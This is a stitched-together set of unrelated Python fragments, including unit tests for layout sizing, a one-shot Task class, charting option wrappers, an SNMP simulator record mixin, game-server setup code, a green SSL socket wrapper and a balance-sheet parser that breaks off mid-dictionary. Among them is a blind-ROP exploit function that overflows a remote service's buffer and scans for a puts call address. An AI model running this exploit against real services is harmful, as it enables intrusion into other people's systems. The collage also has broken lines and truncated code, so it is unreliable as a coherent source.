def test_selects_nothing_when_want_activates_only(self):
requests = 'pr_aa_pw'
order = '____'
self.selection_test(requests, order, wants=['want_activates'])
def test_selects_cmds_and_writes(self):
requests = 'pr_aa_pw'
order = '0670670'
self.selection_test(requests, order, wants=['want_cmds', 'want_writes']) |
class Task(WithLogger):
    """A one-shot runnable unit of work.

    Calling the task runs setup(), execute() and teardown() exactly once;
    the return value of execute() is cached and later retrievable via
    result(). Exceptions raised by execute() are logged and swallowed, in
    which case the cached result stays None.
    """
    def __init__(self, **kwargs: Any) -> None:
        super().__init__(**kwargs)
        self._is_executed = False  # becomes True after the first __call__
        self._result = None  # cached return value of execute()
        self.config = kwargs
    def __call__(self, *args: Any, **kwargs: Any) -> Any:
        """Run the task once; raises ValueError on a second invocation.

        Note that exceptions from execute() are logged at debug level and
        suppressed -- the task is still marked executed and returns None.
        """
        if self._is_executed:
            raise ValueError('Task already executed.')
        self.setup()
        try:
            self._result = self.execute(*args, **kwargs)
        except Exception as e:
            self.logger.debug("Got exception of type {} with message '{}' while executing task.".format(type(e), str(e)))
        finally:
            # teardown() runs whether execute() succeeded or raised.
            self._is_executed = True
            self.teardown()
        return self._result
    def is_executed(self) -> bool:
        """Return True once the task has been run."""
        return self._is_executed
    def result(self) -> Any:
        """Return the cached execute() result; ValueError if not yet run."""
        if (not self._is_executed):
            raise ValueError('Task not executed yet.')
        return self._result
    def setup(self) -> None:
        """Hook run before execute(); no-op here (body empty in this copy)."""
    def execute(self, *args: Any, **kwargs: Any) -> Any:
        """The task's actual work; override in subclasses (no-op here)."""
    def teardown(self) -> None:
        """Hook run after execute(), even on failure; no-op here."""
def test_prolong_low_order_to_restricted(tp_mesh, tp_family, variant):
    """Prolonging a degree-1 function into the interior and facet
    restrictions of a degree-5 element must reproduce it: the two
    restricted parts summed equal the coarse function up to round-off."""
    from firedrake.preconditioners.pmg import prolongation_matrix_matfree
    base = FiniteElement(tp_family, cell=tp_mesh.ufl_cell(), degree=5, variant=variant)
    V_interior = FunctionSpace(tp_mesh, RestrictedElement(base, restriction_domain='interior'))
    V_facet = FunctionSpace(tp_mesh, RestrictedElement(base, restriction_domain='facet'))
    V_coarse = FunctionSpace(tp_mesh, tp_family, degree=1)
    u_interior = Function(V_interior)
    u_facet = Function(V_facet)
    u_coarse = Function(V_coarse)
    # Alternating 0/1 coarse data gives a nontrivial target function.
    u_coarse.dat.data[0::2] = 0.0
    u_coarse.dat.data[1::2] = 1.0
    for target in (u_interior, u_facet):
        prolongation_matrix_matfree(u_coarse, target).getPythonContext()._prolong()
    assert norm((u_interior + u_facet) - u_coarse, 'L2') < 2e-14
def test_migrate_gen_kw(setup_case, set_ert_config):
    """Migrating version-1 block storage must keep the GEN_KW parameter
    metadata (COEFFS) in the experiment's parameter.json."""
    setup_case('block_storage/version-1/poly_example', 'poly.ert')
    with open_storage('storage', 'w') as storage:
        assert len(list(storage.experiments)) == 1
        experiment = next(iter(storage.experiments))
        metadata_file = experiment._path / 'parameter.json'
        param_info = json.loads(metadata_file.read_text(encoding='utf-8'))
        assert 'COEFFS' in param_info
class SizePrefsTestCase(unittest.TestCase):
    """Tests for SizePrefs layout arithmetic: preferred sizes and how
    available space is distributed across static, preferred-size-resizable
    and fully-resizable components, both sequentially (one component per
    slot) and overlapping (several components sharing a slot)."""
    def assert_tuple(self, t1, t2):
        # NOTE(review): only the first two elements are compared, so the
        # 3/4/5-tuple assertions throughout this class effectively check
        # just the first two entries -- confirm whether this is intended.
        self.assertEqual(t1[0], t2[0])
        self.assertEqual(t1[1], t2[1])
    def test_sequential_non_resizable(self):
        """Four static 100px components keep their preferred sizes."""
        prefs = SizePrefs(4, 'h')
        components = [StaticPlotComponent([100, 100]) for i in range(4)]
        for (i, c) in enumerate(components):
            prefs.update_from_component(c, i)
        pref_size = prefs.get_preferred_size()
        self.assert_tuple(pref_size, (100, 100, 100, 100))
        sizes = prefs.compute_size_array(400)
        self.assert_tuple(sizes, (100, 100, 100, 100))
        sizes2 = prefs.compute_size_array(500)
        # NOTE(review): `sizes2` is computed but the assertion below
        # re-checks `sizes`; it presumably should assert on `sizes2`
        # (expected value to be confirmed against SizePrefs semantics).
        self.assert_tuple(sizes, (100, 100, 100, 100))
    def test_overlapping_non_resizable(self):
        """Overlapping statics: preferred size is the max; extra space is
        still handed to the single slot."""
        prefs = SizePrefs(1, 'h')
        prefs.update_from_component(StaticPlotComponent([100, 10]), 0)
        prefs.update_from_component(StaticPlotComponent([200, 10]), 0)
        prefs.update_from_component(StaticPlotComponent([300, 10]), 0)
        pref_size = prefs.get_preferred_size()
        self.assertEqual(pref_size[0], 300)
        sizes = prefs.compute_size_array(400)
        self.assertEqual(sizes[0], 400)
    def test_sequential_resizable(self):
        """Resizables with preferred sizes scale proportionally with the
        available space."""
        prefs = SizePrefs(3, 'v')
        prefs.update_from_component(ResizablePlotComponent([10, 100]), 0)
        prefs.update_from_component(ResizablePlotComponent([10, 200]), 1)
        prefs.update_from_component(ResizablePlotComponent([10, 300]), 2)
        pref_size = prefs.get_preferred_size()
        self.assert_tuple(pref_size, (100, 200, 300))
        sizes = prefs.compute_size_array(600)
        self.assert_tuple(sizes, [100, 200, 300])
        sizes2 = prefs.compute_size_array(60)
        self.assert_tuple(sizes2, [10, 20, 30])
        sizes3 = prefs.compute_size_array(6000)
        self.assert_tuple(sizes3, [1000, 2000, 3000])
    def test_overlapping_resizable(self):
        prefs = SizePrefs(2, 'h')
        prefs.update_from_component(ResizablePlotComponent([50, 10]), 0)
        prefs.update_from_component(ResizablePlotComponent([100, 10]), 0)
        prefs.update_from_component(ResizablePlotComponent([80, 10]), 1)
        pref_size = prefs.get_preferred_size()
        self.assert_tuple(pref_size, (100, 80))
        sizes = prefs.compute_size_array(180)
        self.assert_tuple(sizes, (100, 80))
        sizes2 = prefs.compute_size_array(360)
        self.assert_tuple(sizes2, (200, 160))
    def test_sequential_fully_resizable(self):
        """Fully resizable components (no preferred size) split space evenly."""
        prefs = SizePrefs(3, 'h')
        for i in range(3):
            prefs.update_from_component(ResizablePlotComponent(), i)
        pref_size = prefs.get_preferred_size()
        self.assert_tuple(pref_size, (0, 0, 0))
        sizes = prefs.compute_size_array(60)
        self.assert_tuple(sizes, (20, 20, 20))
    def test_overlapping_fully_resizable(self):
        prefs = SizePrefs(1, 'h')
        for i in range(3):
            prefs.update_from_component(ResizablePlotComponent(), 0)
        pref_size = prefs.get_preferred_size()
        self.assertEqual(pref_size[0], 0)
        sizes = prefs.compute_size_array(60)
        self.assertEqual(sizes[0], 60)
    def test_sequential_mixed_resizable(self):
        """Preferred-size resizables are satisfied first; only the surplus
        goes to fully resizable components."""
        prefs = SizePrefs(3, 'h')
        prefs.update_from_component(ResizablePlotComponent(), 0)
        prefs.update_from_component(ResizablePlotComponent([100, 10]), 1)
        prefs.update_from_component(ResizablePlotComponent(), 2)
        pref_size = prefs.get_preferred_size()
        self.assert_tuple(pref_size, (0, 100, 0))
        sizes = prefs.compute_size_array(50)
        self.assert_tuple(sizes, (0, 50, 0))
        sizes2 = prefs.compute_size_array(100)
        self.assert_tuple(sizes2, (0, 100, 0))
        sizes3 = prefs.compute_size_array(200)
        self.assert_tuple(sizes3, (50, 100, 50))
    def test_overlapping_mixed_resizable(self):
        prefs = SizePrefs(4, 'h')
        prefs.update_from_component(ResizablePlotComponent([100, 10]), 0)
        prefs.update_from_component(ResizablePlotComponent(), 0)
        prefs.update_from_component(ResizablePlotComponent(), 1)
        prefs.update_from_component(ResizablePlotComponent([50, 10]), 1)
        prefs.update_from_component(ResizablePlotComponent(), 2)
        prefs.update_from_component(ResizablePlotComponent([40, 10]), 2)
        prefs.update_from_component(ResizablePlotComponent(), 3)
        prefs.update_from_component(ResizablePlotComponent(), 3)
        pref_size = prefs.get_preferred_size()
        self.assert_tuple(pref_size, (100, 50, 40, 0))
        sizes = prefs.compute_size_array(95)
        self.assert_tuple(sizes, (50, 25, 20, 0))
        sizes2 = prefs.compute_size_array(230)
        self.assert_tuple(sizes2, (100, 50, 40, 40))
    def test_sequential_mixed_resizable_static(self):
        """Statics are pinned at their preferred size; surplus is shared
        among the resizables proportionally to their preferences."""
        prefs = SizePrefs(3, 'h')
        prefs.update_from_component(StaticPlotComponent([100, 10]), 0)
        prefs.update_from_component(ResizablePlotComponent([50, 10]), 1)
        prefs.update_from_component(ResizablePlotComponent([75, 10]), 2)
        pref_size = prefs.get_preferred_size()
        self.assert_tuple(pref_size, (100, 50, 75))
        sizes = prefs.compute_size_array(225)
        self.assert_tuple(sizes, (100, 50, 75))
        sizes2 = prefs.compute_size_array(350)
        self.assert_tuple(sizes2, (100, 100, 150))
    def test_sequential_mixed_resizable_static2(self):
        prefs = SizePrefs(4, 'h')
        prefs.update_from_component(StaticPlotComponent([100, 10]), 0)
        prefs.update_from_component(ResizablePlotComponent([50, 10]), 1)
        prefs.update_from_component(ResizablePlotComponent([75, 10]), 2)
        prefs.update_from_component(ResizablePlotComponent(), 3)
        pref_size = prefs.get_preferred_size()
        self.assert_tuple(pref_size, (100, 50, 75, 0))
        sizes = prefs.compute_size_array(300)
        self.assert_tuple(sizes, (100, 50, 75, 75))
    def test_overlapping_mixed_resizable_static(self):
        prefs = SizePrefs(5, 'h')
        prefs.update_from_component(StaticPlotComponent([100, 10]), 0)
        prefs.update_from_component(ResizablePlotComponent([50, 10]), 0)
        prefs.update_from_component(StaticPlotComponent([30, 10]), 1)
        prefs.update_from_component(ResizablePlotComponent([60, 10]), 1)
        prefs.update_from_component(StaticPlotComponent([50, 10]), 2)
        prefs.update_from_component(ResizablePlotComponent(), 2)
        prefs.update_from_component(ResizablePlotComponent([90, 10]), 3)
        prefs.update_from_component(ResizablePlotComponent(), 3)
        prefs.update_from_component(ResizablePlotComponent(), 4)
        pref_size = prefs.get_preferred_size()
        self.assert_tuple(pref_size, (100, 60, 50, 90, 0))
        sizes = prefs.compute_size_array((180 + 60))
        self.assert_tuple(sizes, (100, (30 + 15), 50, 45, 0))
        sizes2 = prefs.compute_size_array((300 + 35))
        self.assert_tuple(sizes2, (100, 60, 50, 90, 35))
class OptionPlotoptionsBellcurveSonificationDefaultinstrumentoptionsMappingNoteduration(Options):
    """Option wrapper for the bellcurve sonification noteDuration mapping.

    NOTE(review): each getter/setter pair in this copy was defined twice
    without decorators, so the setter silently shadowed the getter. The
    pairs are plainly @property / @<name>.setter accessors (they delegate
    to self._config_get / self._config); the decorators are restored here.
    """

    @property
    def mapFunction(self):
        """Mapping function applied to the value (stored config, default None)."""
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        """Target property the mapping writes to (default None)."""
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        """Upper bound for the mapped value (default None)."""
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        """Lower bound for the mapped value (default None)."""
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        """Range context the mapping is evaluated within (default None)."""
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class SnmprecRecordMixIn(object):
    """Mixin extending snmprec.SnmprecRecord with variation-module support.

    A value tag of the form "<tag>:<module>" routes evaluation and
    formatting through the named variation module registered in the
    request context.
    """
    def evaluate_value(self, oid, tag, value, **context):
        """Evaluate one record value, dispatching to a variation module
        when the tag names one; raises SnmpsimError if the module is
        referenced but not loaded."""
        # Tag "t:mod" -> plain tag "t" plus variation-module name "mod".
        if (':' in tag):
            (mod_name, tag) = (tag[(tag.index(':') + 1):], tag[:tag.index(':')])
        else:
            mod_name = None
        if mod_name:
            if (('variationModules' in context) and (mod_name in context['variationModules'])):
                if ('dataValidation' in context):
                    # Validation pass: do not invoke the module, just
                    # report a null value for this OID.
                    return (oid, tag, univ.Null)
                else:
                    if context['setFlag']:
                        # On SNMP SET, precompute the hex rendering of the
                        # new value for the module's benefit.
                        hexvalue = self.grammar.hexify_value(context['origValue'])
                        if (hexvalue is not None):
                            context['hexvalue'] = hexvalue
                            context['hextag'] = self.grammar.get_tag_by_type(context['origValue'])
                            context['hextag'] += 'x'
                    (variation_module, agent_contexts, record_contexts) = context['variationModules'][mod_name]
                    # Lazily create per-data-file state for the module.
                    if (context['dataFile'] not in agent_contexts):
                        agent_contexts[context['dataFile']] = {}
                    if (context['dataFile'] not in record_contexts):
                        record_contexts[context['dataFile']] = {}
                    variation_module['agentContext'] = agent_contexts[context['dataFile']]
                    # Narrow to this data file's per-OID state.
                    record_contexts = record_contexts[context['dataFile']]
                    if (oid not in record_contexts):
                        record_contexts[oid] = {}
                    variation_module['recordContext'] = record_contexts[oid]
                    # Delegate the actual value production to the module.
                    handler = variation_module['variate']
                    (oid, tag, value) = handler(oid, tag, value, **context)
                    ReportingManager.update_metrics(variation=mod_name, variation_call_count=1, **context)
            else:
                ReportingManager.update_metrics(variation=mod_name, variation_failure_count=1, **context)
                raise SnmpsimError(('Variation module "%s" referenced but not loaded\r\n' % mod_name))
        if (not mod_name):
            if ('dataValidation' in context):
                # Plain record: let the base class validate it.
                snmprec.SnmprecRecord.evaluate_value(self, oid, tag, value, **context)
            if (((not context['nextFlag']) and (not context['exactMatch'])) or context['setFlag']):
                # No usable match (or a SET): report the error status.
                return (context['origOid'], tag, context['errorStatus'])
            if (not hasattr(value, 'tagSet')):
                # Value is not a pyasn1 object yet -- base class converts it.
                return snmprec.SnmprecRecord.evaluate_value(self, oid, tag, value, **context)
        return (oid, tag, value)
    def evaluate(self, line, **context):
        """Parse one .snmprec line and evaluate it into (oid, value)."""
        (oid, tag, value) = self.grammar.parse(line)
        oid = self.evaluate_oid(oid)
        if context.get('oidOnly'):
            value = None
        else:
            try:
                (oid, tag, value) = self.evaluate_value(oid, tag, value, **context)
            except NoDataNotification:
                raise
            except MibOperationError:
                raise
            except PyAsn1Error as exc:
                # Wrap ASN.1 decoding problems with the offending record info.
                raise SnmpsimError(('value evaluation for %s = %r failed: %s\r\n' % (oid, value, exc)))
        return (oid, value)
    def format_value(self, oid, value, **context):
        """Render (oid, value) back to .snmprec text, routing through the
        active variation module's `record` handler when one is set."""
        (text_oid, text_tag, text_value) = snmprec.SnmprecRecord.format_value(self, oid, value)
        if context['variationModule']:
            # Prefer the non-hex rendering; if the tags differ, stash the
            # hex form in the context for the module.
            (plain_oid, plain_tag, plain_value) = snmprec.SnmprecRecord.format_value(self, oid, value, nohex=True)
            if (plain_tag != text_tag):
                (context['hextag'], context['hexvalue']) = (text_tag, text_value)
            else:
                (text_tag, text_value) = (plain_tag, plain_value)
            handler = context['variationModule']['record']
            (text_oid, text_tag, text_value) = handler(text_oid, text_tag, text_value, **context)
        elif (('stopFlag' in context) and context['stopFlag']):
            raise NoDataNotification()
        return (text_oid, text_tag, text_value)
def unregisterStatsCallback(callback):
    """Remove a previously registered stats callback.

    Returns True when the callback was found and removed; logs an error
    and returns False when it was never registered.
    """
    with _stats_lock:
        if callback not in _stats_callbacks:
            _logger.error('Callback {!r} is not registered'.format(callback))
            return False
        _stats_callbacks.remove(callback)
        _logger.debug('Unregistered stats-callback {!r}'.format(callback))
        return True
class OptionPlotoptionsVariablepieSonificationContexttracksPointgrouping(Options):
    """Option wrapper for variablepie sonification point grouping.

    NOTE(review): each getter/setter pair in this copy was defined twice
    without decorators, so the setter silently shadowed the getter. The
    pairs are plainly @property / @<name>.setter accessors (they delegate
    to self._config_get / self._config); the decorators are restored here.
    """

    @property
    def algorithm(self):
        """Grouping algorithm (default 'minmax')."""
        return self._config_get('minmax')

    @algorithm.setter
    def algorithm(self, text: str):
        self._config(text, js_type=False)

    @property
    def enabled(self):
        """Whether point grouping is active (default True)."""
        return self._config_get(True)

    @enabled.setter
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def groupTimespan(self):
        """Timespan of one group in milliseconds (default 15)."""
        return self._config_get(15)

    @groupTimespan.setter
    def groupTimespan(self, num: float):
        self._config(num, js_type=False)

    @property
    def prop(self):
        """Point property used for grouping (default 'y')."""
        return self._config_get('y')

    @prop.setter
    def prop(self, text: str):
        self._config(text, js_type=False)
def create_objects():
    """Initial database setup: create Account #1, its character and the
    Limbo starting room, idempotently (existing objects are reused)."""
    logger.log_info('Initial setup: Creating objects (Account #1 and Limbo room) ...')
    superuser = _get_superuser_account()
    from evennia.objects.models import ObjectDB
    # Rebuild the superuser account on the configured typeclass; swapping
    # with clean_attributes=True wipes stale attributes first.
    account_typeclass = settings.BASE_ACCOUNT_TYPECLASS
    superuser.swap_typeclass(account_typeclass, clean_attributes=True)
    superuser.basetype_setup()
    superuser.at_account_creation()
    # Lock down destructive operations on account #1 while allowing messages.
    superuser.locks.add('examine:perm(Developer);edit:false();delete:false();boot:false();msg:all()')
    superuser.permissions.add('Developer')
    # Reuse object #1 as the superuser's character if it already exists.
    try:
        superuser_character = ObjectDB.objects.get(id=1)
    except ObjectDB.DoesNotExist:
        (superuser_character, errors) = superuser.create_character(key=superuser.username, nohome=True, description=_('This is User #1.'))
        if errors:
            raise Exception(str(errors))
    superuser_character.locks.add('examine:perm(Developer);edit:false();delete:false();boot:false();msg:all();puppet:false()')
    superuser_character.permissions.add('Developer')
    superuser_character.save()
    # First-login bookkeeping so the account puppets this character.
    superuser.attributes.add('_first_login', True)
    superuser.attributes.add('_last_puppet', superuser_character)
    # Reuse object #2 as Limbo if it already exists.
    room_typeclass = settings.BASE_ROOM_TYPECLASS
    try:
        limbo_obj = ObjectDB.objects.get(id=2)
    except ObjectDB.DoesNotExist:
        limbo_obj = create.create_object(room_typeclass, _('Limbo'), nohome=True)
    limbo_obj.db_typeclass_path = room_typeclass
    limbo_obj.db.desc = LIMBO_DESC.strip()
    limbo_obj.save()
    # Anchor the character in Limbo if it has no location/home yet.
    if (not superuser_character.location):
        superuser_character.location = limbo_obj
    if (not superuser_character.home):
        superuser_character.home = limbo_obj
class GreenConnection(greenio.GreenSocket):
    """Cooperative (green) wrapper around a pyOpenSSL Connection.

    Blocking SSL operations are retried after trampolining on the
    underlying fd so other greenthreads can run while this one waits.
    NOTE(review): __init__ calls super(ConnectionType, self) -- presumably
    ConnectionType is bound to this class elsewhere in the module; confirm.
    """
    def __init__(self, ctx, sock=None):
        # `ctx` is an SSL context when `sock` is given (we wrap the socket),
        # otherwise it is an already-wrapped Connection object.
        if (sock is not None):
            fd = orig_SSL.Connection(ctx, sock)
        else:
            fd = ctx
        super(ConnectionType, self).__init__(fd)
    def do_handshake(self):
        """Perform the SSL handshake, yielding to the hub until it completes."""
        if self.act_non_blocking:
            return self.fd.do_handshake()
        while True:
            try:
                return self.fd.do_handshake()
            except WantReadError:
                trampoline(self.fd.fileno(), read=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
            except WantWriteError:
                trampoline(self.fd.fileno(), write=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
    def dup(self):
        raise NotImplementedError('Dup not supported on SSL sockets')
    def makefile(self, mode='r', bufsize=(- 1)):
        raise NotImplementedError('Makefile not supported on SSL sockets')
    def read(self, size):
        """Works like a blocking call to SSL_read(): retry on
        WantRead/WantWrite until data arrives; a syscall error is treated
        as the peer closing the connection and yields ''."""
        if self.act_non_blocking:
            return self.fd.read(size)
        while True:
            try:
                return self.fd.read(size)
            except WantReadError:
                trampoline(self.fd.fileno(), read=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
            except WantWriteError:
                trampoline(self.fd.fileno(), write=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
            except SysCallError as e:
                # errno -1 (EOF) or any positive errno: connection is gone.
                if ((get_errno(e) == (- 1)) or (get_errno(e) > 0)):
                    return ''
    recv = read
    def write(self, data):
        """Works like a blocking call to SSL_write(): retry on
        WantRead/WantWrite until the data is handed to OpenSSL."""
        if (not data):
            return 0
        if self.act_non_blocking:
            return self.fd.write(data)
        while True:
            try:
                return self.fd.write(data)
            except WantReadError:
                trampoline(self.fd.fileno(), read=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
            except WantWriteError:
                trampoline(self.fd.fileno(), write=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
    send = write
    def sendall(self, data):
        """Send all of `data`, looping on the byte count send() reports."""
        tail = self.send(data)
        while (tail < len(data)):
            tail += self.send(data[tail:])
    def shutdown(self):
        """Shut the SSL connection down, yielding until OpenSSL is done."""
        if self.act_non_blocking:
            return self.fd.shutdown()
        while True:
            try:
                return self.fd.shutdown()
            except WantReadError:
                trampoline(self.fd.fileno(), read=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
            except WantWriteError:
                trampoline(self.fd.fileno(), write=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
def get_puts_call_addr():
    """Blind-ROP scan for the address of a "call puts" in the target.

    Starting just past `stop_addr`, probe successive addresses: each probe
    overflows the buffer, loads 0x400000 (the ELF load base) as the argument
    via the gadget at gadgets_addr + 9 (presumably a pop-arg gadget -- from
    the earlier BROP stage), jumps to the candidate address and returns to
    the stop gadget. When the service echoes the ELF header back, the
    candidate is the puts call. Relies on module-level stop_addr, buf_size,
    gadgets_addr, get_io, p64 and log.

    NOTE(review): recv() may return bytes on Python 3, in which case the
    startswith('\\x7fELF') comparison never matches -- confirm the pwntools/
    Python version this script targets.
    """
    addr = stop_addr
    while True:
        addr += 1
        payload = ('A' * buf_size)
        payload += p64((gadgets_addr + 9))
        payload += p64(4194304)  # 0x400000: ELF base, passed as puts() arg
        payload += p64(addr)  # candidate "call puts" address
        payload += p64(stop_addr)  # land on the stop gadget afterwards
        try:
            io = get_io()
            io.sendline(payload)
            if io.recv().startswith('\x7fELF'):
                log.info(('puts call address: 0x%x' % addr))
                io.close()
                return addr
            log.info(('bad: 0x%x' % addr))
            io.close()
        except EOFError as e:
            # The candidate crashed the service: not a puts call.
            io.close()
            log.info(('bad: 0x%x' % addr))
        except Exception:
            # Was a bare `except:`; narrowed so Ctrl-C/SystemExit still
            # abort the scan. Connection failure: undo the increment so the
            # same address is retried on the next iteration.
            log.info("Can't connect")
            addr -= 1
# NOTE(review): the line below was evidently "@pytest.fixture(scope='module')"
# with the decorator prefix lost in this copy; as written it is not a valid
# statement -- restore from the original file.
(scope='module')
def module1_unique():
    """Factory fixture: returns a fresh helper class (not an instance) whose
    methods read attributes off a w3 object passed at construction time."""
    class Module1():
        a = 'a'
        def __init__(self, w3):
            self._b = 'b'
            self.w3 = w3
        def b(self):
            return self._b
        def return_eth_chain_id(self):
            # Demonstrates delegating through the attached w3 instance.
            return self.w3.eth.chain_id
    return Module1
def get_balance_sheet_items(security_item, start_date=None, report_period=None, report_event_date=None, return_type='json'):
    """Load the balance-sheet data file for a security and return its rows.

    The data file is a fixed-layout GB2312 text table: one balance-sheet
    line item per row, one reporting period per column. Each row is split
    on whitespace; element 0 is the row label and the trailing element is
    dropped, hence the [1:-1] slices below.

    Filters: `start_date` drops earlier periods; `report_period` selects a
    single period (returned directly, not as a list); `report_event_date`
    drops reports announced after that date. `return_type` 'doc' wraps each
    record in a BalanceSheet document instead of a plain dict.

    Returns a list sorted by reportPeriod (or a single record when
    `report_period` matches).
    """
    security_item = to_security_item(security_item)
    path = get_balance_sheet_path(security_item)
    # Fetch the raw finance data file on first use.
    _download_finance_data_if_need(path, security_item['code'])
    encoding = 'GB2312'
    with open(path, encoding=encoding) as fr:
        lines = fr.readlines()
        # Fixed row layout: each variable below is one balance-sheet line
        # item across all reporting periods (note the skipped section-header
        # rows at indices 2, 20, 42, 60 and 72).
        reportDate = lines[0].split()[1:(- 1)]
        moneyFunds = lines[3].split()[1:(- 1)]
        heldForTradingFinancialAssets = lines[4].split()[1:(- 1)]
        derivative = lines[5].split()[1:(- 1)]
        billsReceivable = lines[6].split()[1:(- 1)]
        accountsReceivable = lines[7].split()[1:(- 1)]
        prepaidAccounts = lines[8].split()[1:(- 1)]
        interestReceivable = lines[9].split()[1:(- 1)]
        dividendReceivable = lines[10].split()[1:(- 1)]
        otherReceivables = lines[11].split()[1:(- 1)]
        buyingBackTheSaleOfFinancialAssets = lines[12].split()[1:(- 1)]
        inventory = lines[13].split()[1:(- 1)]
        assetsForSale = lines[14].split()[1:(- 1)]
        nonCurrentAssetsDueWithinOneYear = lines[15].split()[1:(- 1)]
        unamortizedExpenditures = lines[16].split()[1:(- 1)]
        waitDealIntangibleAssetsLossOrIncome = lines[17].split()[1:(- 1)]
        otherCurrentAssets = lines[18].split()[1:(- 1)]
        totalCurrentAssets = lines[19].split()[1:(- 1)]
        loansAndPaymentsOnBehalf = lines[21].split()[1:(- 1)]
        availableForSaleFinancialAssets = lines[22].split()[1:(- 1)]
        heldToMaturityInvestment = lines[23].split()[1:(- 1)]
        longTermReceivables = lines[24].split()[1:(- 1)]
        longTermEquityInvestment = lines[25].split()[1:(- 1)]
        investmentRealEstate = lines[26].split()[1:(- 1)]
        NetfixedAssets = lines[27].split()[1:(- 1)]
        constructionInProcess = lines[28].split()[1:(- 1)]
        engineerMaterial = lines[29].split()[1:(- 1)]
        fixedAssetsInLiquidation = lines[30].split()[1:(- 1)]
        productiveBiologicalAssets = lines[31].split()[1:(- 1)]
        nonProfitLivingAssets = lines[32].split()[1:(- 1)]
        oilAndGasAssets = lines[33].split()[1:(- 1)]
        intangibleAssets = lines[34].split()[1:(- 1)]
        developmentExpenditure = lines[35].split()[1:(- 1)]
        goodwill = lines[36].split()[1:(- 1)]
        longTermDeferredExpenses = lines[37].split()[1:(- 1)]
        deferredIncomeTaxAssets = lines[38].split()[1:(- 1)]
        OtherNonCurrentAssets = lines[39].split()[1:(- 1)]
        nonCurrentAssets = lines[40].split()[1:(- 1)]
        totalAssets = lines[41].split()[1:(- 1)]
        shortTermBorrowing = lines[43].split()[1:(- 1)]
        transactionFinancialLiabilities = lines[44].split()[1:(- 1)]
        billsPayable = lines[45].split()[1:(- 1)]
        accountsPayable = lines[46].split()[1:(- 1)]
        accountsReceivedInAdvance = lines[47].split()[1:(- 1)]
        handlingChargesAndCommissionsPayable = lines[48].split()[1:(- 1)]
        employeeBenefitsPayable = lines[49].split()[1:(- 1)]
        taxesAndSurchargesPayable = lines[50].split()[1:(- 1)]
        interestPayable = lines[51].split()[1:(- 1)]
        dividendpayable = lines[52].split()[1:(- 1)]
        otherPayables = lines[53].split()[1:(- 1)]
        withholdingExpenses = lines[54].split()[1:(- 1)]
        deferredIncomeWithinOneYear = lines[55].split()[1:(- 1)]
        shortTermDebenturesPayable = lines[56].split()[1:(- 1)]
        nonCurrentLiabilitiesMaturingWithinOneYear = lines[57].split()[1:(- 1)]
        otherCurrentLiability = lines[58].split()[1:(- 1)]
        totalCurrentLiabilities = lines[59].split()[1:(- 1)]
        LongTermBorrowing = lines[61].split()[1:(- 1)]
        bondPayable = lines[62].split()[1:(- 1)]
        longTermPayables = lines[63].split()[1:(- 1)]
        longTermEmployeeBenefitsPayable = lines[64].split()[1:(- 1)]
        specialPayable = lines[65].split()[1:(- 1)]
        expectedNonCurrentLiabilities = lines[66].split()[1:(- 1)]
        deferredIncomeTaxLiabilities = lines[67].split()[1:(- 1)]
        longTermDeferredRevenue = lines[68].split()[1:(- 1)]
        otherNonCurrentLiabilities = lines[69].split()[1:(- 1)]
        totalNonCurrentLiabilities = lines[70].split()[1:(- 1)]
        totalLiabilities = lines[71].split()[1:(- 1)]
        totalShareCapital = lines[73].split()[1:(- 1)]
        capitalSurplus = lines[74].split()[1:(- 1)]
        treasuryStock = lines[75].split()[1:(- 1)]
        otherComprehensiveIncome = lines[76].split()[1:(- 1)]
        theSpecialReserve = lines[77].split()[1:(- 1)]
        surplusReserves = lines[78].split()[1:(- 1)]
        generalRiskPreparation = lines[79].split()[1:(- 1)]
        undistributedProfits = lines[80].split()[1:(- 1)]
        bookValue = lines[81].split()[1:(- 1)]
        minorityBookValue = lines[82].split()[1:(- 1)]
        totalBookValue = lines[83].split()[1:(- 1)]
        totalLiabilitiesAndOwnersEquity = lines[84].split()[1:(- 1)]
        result_list = []
        # One record per reporting period (column), applying the filters.
        for (idx, _) in enumerate(reportDate):
            if start_date:
                if (pd.Timestamp(reportDate[idx]) < pd.Timestamp(start_date)):
                    continue
            reportEventDate = get_report_event_date(security_item, report_period=reportDate[idx])
            if (report_period and (not is_same_date(report_period, reportDate[idx]))):
                continue
            if (report_event_date and (pd.Timestamp(report_event_date) < pd.Timestamp(reportEventDate))):
                continue
            the_json = {'id': '{}_{}'.format(security_item['id'], reportDate[idx]), 'reportPeriod': to_time_str(reportDate[idx]), 'timestamp': to_time_str(reportEventDate), 'reportEventDate': to_time_str(reportEventDate), 'securityId': security_item['id'], 'code': security_item['code'], 'moneyFunds': to_float(moneyFunds[idx]), 'heldForTradingFinancialAssets': to_float(heldForTradingFinancialAssets[idx]), 'derivative': to_float(derivative[idx]), 'billsReceivable': to_float(billsReceivable[idx]), 'accountsReceivable': to_float(accountsReceivable[idx]), 'prepaidAccounts': to_float(prepaidAccounts[idx]), 'interestReceivable': to_float(interestReceivable[idx]), 'dividendReceivable': to_float(dividendReceivable[idx]), 'otherReceivables': to_float(otherReceivables[idx]), 'buyingBackTheSaleOfFinancialAssets': to_float(buyingBackTheSaleOfFinancialAssets[idx]), 'inventory': to_float(inventory[idx]), 'assetsForSale': to_float(assetsForSale[idx]), 'nonCurrentAssetsDueWithinOneYear': to_float(nonCurrentAssetsDueWithinOneYear[idx]), 'unamortizedExpenditures': to_float(unamortizedExpenditures[idx]), 'waitDealIntangibleAssetsLossOrIncome': to_float(waitDealIntangibleAssetsLossOrIncome[idx]), 'otherCurrentAssets': to_float(otherCurrentAssets[idx]), 